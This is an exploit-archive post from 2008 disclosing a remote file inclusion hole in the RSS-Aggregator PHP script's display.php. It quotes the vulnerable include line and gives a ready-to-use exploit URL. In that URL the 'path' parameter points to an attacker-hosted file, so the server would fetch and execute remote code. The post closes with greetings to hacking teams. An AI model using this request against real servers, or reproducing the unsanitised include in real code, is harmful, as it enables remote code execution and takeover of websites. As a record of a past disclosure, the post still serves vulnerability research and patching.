RSS-Aggregator (display.php path) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : RSS-Aggregator (display.php path) Remote File Inclusion Vulnerability
# Published : 2008-06-22
# Author : Ghost Hacker
# Previous Title : PageSquid CMS (index.php page) Remote SQL Injection Vulnerability
# Next Title : MiGCMS 2.0.5 Multiple Remote File Inclusion Vulnerabilities

##############################################################
 RSS-aggregator (display) Remote File Inclusion Vulnerability
##############################################################
[~] Found : Ghost Hacker [ R-H TeaM ]
[~] HOME  : www.Real-Hack.net
[~] Email : Ghost-r00t@Hotmail.com
[~] Script : RSS-aggregator
[~] Download Script : http://www.rss-aggregator.com/download.php
=========================== [ Viva IslaM ] ==========================
Error ( display.PHP ) :
include_once($path.'/admin/fonctions/config.php');

Exploit :
http://xxxx/[Path]/display.php?path=[EVIL]
=========================== [ Viva IslaM ] ==========================
[~] Gootz :
PROTO & QaTaR BoeZ TeaM & v4 TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & Jiko & Mr.JUVE
Mr.hope & Mr.MoSoS & x.CJP.x & Dr.Shares & eLe$ & MR.SQL & QaT HaCkEr ..
All Member Real Hack And All My Friends ..
##############################################################
 Found By Ghost Hacker & My TeaM R-H
##############################################################

# www.Syue.com [2008-06-22]